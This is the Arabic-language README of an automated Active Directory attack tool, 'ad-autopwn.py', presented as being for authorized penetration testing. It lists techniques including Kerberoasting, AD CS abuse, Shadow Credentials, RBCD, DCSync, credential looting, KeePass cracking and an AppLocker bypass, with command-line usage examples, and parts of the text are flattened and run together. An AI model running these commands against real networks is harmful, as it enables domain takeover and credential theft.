
سلسلة هجوم آلية على Active Directory من عدم المصادقة إلى مسؤول المجال. يجمع أكثر من 25 تقنية بما في ذلك Kerberoast وAD CS ESC1-16 وShadow Credentials وRBCD وDCSync واستغلالات Synacktiv 2026 الانعكاسية. اختبار الاختراق المصرح به فقط.
من الصفر إلى مدير المجال — سلسلة هجوم آلية على Active Directory
أداة اختبار اختراق آلية بالكامل تربط أكثر من 25 تقنية هجوم لاختراق بيئات Active Directory. مصممة لتقييمات الأمن المصرح بها.
_ ___ _ _ ___
/_\ | \ /_\ _ _| |_ ___| _ \__ __ ___ _
/ _ \| |) | / _ \ || | _/ _ \ _/\ V V / ' \
/_/ \_\___/ /_/ \_\_,_|\__\___/_| \_/\_/|_||_|
⚡ من الصفر إلى مدير المجال — سلسلة هجوم
اكتشاف | تنصت | ARP | WPAD | WSUS | PXE | AD CS | SCCM | Roast
BloodHound | انعكاس | نهب | RBCD+KCD | DCSync | DPAPI
DONT_REQ_PREAUTH)--spray-password).library-ms / .theme / .url على مشاركات قابلة للكتابةbloodhound-python -c All + تحليل ZIPWriteSPN, AddKeyCredentialLink, GenericAll/Write, WriteDacl/Owner, WriteAccountRestrictions, AddAllowedToAct, ForceChangePasswordWriteSPN → ترقية ghost-SPN (CVE-2025-58726)AddKeyCredentialLink → ظل بيانات الاعتماد → PKINIT → تجزئة NTGenericAll / WriteAccountRestrictions على Computer → سلسلة RBCD → TGS مدير-altservice، في مرحلة واحدة-altservice$ التلقائية من KDC عند البحث عن المدير → TGT لمستخدم Linux عبر حساب جهاز <user>$ تم إنشاؤه تلقائيًا → GSSAPI SSHGet-CimInstance Win32_Process عبر nxc -x; تعبيرات منتظمة لكلمات المرور في mysql/sqlcmd/runas/KeePass/علامات --password*.kdbx في C:\Users، تنزيل عبر smbclient، keepass2john | hashcat -m 13400# آلي بالكامل — سلسلة بدون بيانات اعتماد (يكتشف كل شيء تلقائيًا)
sudo ./ad-autopwn.py
# مع بيانات الاعتماد — سلسلة كاملة
./ad-autopwn.py -u jsmith -p 'P@ss123' -d corp.local --dc-ip 10.0.0.1
# معامل AWS / VPC (هجمات الطبقة الثانية محظورة) — الاكتشاف التلقائي ما زال يعمل
sudo ./ad-autopwn.py --no-arp --no-wpad
# اكتشاف بيانات الاعتماد قبل المصادقة (آمن ضد قفل الحساب)
sudo ./ad-autopwn.py --phase discover --no-arp --no-wpad
# جمع رسم بياني لـ BloodHound + تحليل تلقائي للقيم العالية
./ad-autopwn.py --phase bloodhound -u user -p pass -d corp.local \
--dc-ip 10.0.0.1 --dc-fqdn dc01.corp.local
# Dollar Ticket — TGT لـ 'root' عبر حساب جهاز root$ تم إنشاؤه تلقائيًا
./ad-autopwn.py -u user -p pass -d corp.local --dc-ip 10.0.0.1 \
--phase dollar-ticket --target-user root
# سلسلة RBCD+KCD — ghost-SPN كامل + RBCD + إعادة كتابة altservice، لقطة واحدة
./ad-autopwn.py -u user -p pass -d corp.local --dc-ip 10.0.0.1 \
--phase rbcd-kcd -T VHAGAR$ --alt-spn HTTP/vhagar.corp.local
# تجاوز AppLocker
./ad-autopwn.py -u user -p pass --applocker --lolbin mshta --custom-cmd "whoami"
# تشغيل جاف (طباعة كل أمر، لا تنفيذ — حتى العمليات الخلفية)
./ad-autopwn.py --dry-run -u user -p pass -d corp.local --dc-ip 10.0.0.1